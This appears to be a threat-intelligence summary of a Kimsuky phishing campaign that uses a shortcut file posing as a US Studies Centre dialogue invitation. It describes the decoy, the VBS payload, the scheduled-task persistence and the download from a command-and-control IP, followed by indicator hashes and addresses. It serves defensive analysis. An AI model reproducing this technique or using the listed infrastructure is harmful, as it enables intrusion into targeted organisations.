Kimsuky(김수키) 악성코드 주의!USSC 연구센터 사칭 악성코드 발견– 한·호·일 협력 대화 위장 공격(2025.4.16)
2025-05-06 • Sakai • Beware of Kimsuky Malware! Malware Impersonating the USSC Research Center Discovered - Attack Disguised as Korea-Australia-Japan Cooperation Dialogue (2025.4.16) •
A Kimsuky-attributed LNK impersonates the United States Studies Centre and a Track 1.5 Australia-Korea-Japan dialogue on future-oriented cooperation. The shortcut locates PowerShell, finds a same-size LNK, extracts and opens an embedded PDF decoy, then XOR-decodes a VBS payload into the Public Videos directory. It creates a scheduled task named authentication_up to run the VBS every 18 minutes, using a Chrome icon to make the lure appear less suspicious. The VBS downloads a file from 103.149.98.247 under /vs/tt/d.php, renames it as a batch file, executes it silently, and deletes it, indicating a staged downloader chain aimed at policy, diplomacy, or regional-security targets.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 89a725b08ab0e8885fc03b543638be96 | 2025-04-18 | 2025-07-01 |
| IPv4 | 103.149.98.247 | 2025-04-18 | 2025-07-01 |
| IPv4 | 3.149.98.247 | 2025-05-06 | 2025-05-06 |
| HASH | 20443f517f22b292d63e7e06d9713b7… | 2025-04-18 | 2025-05-06 |
| HASH | 42f306b905ece8875bdf16d276b8e4c… | 2025-04-18 | 2025-05-06 |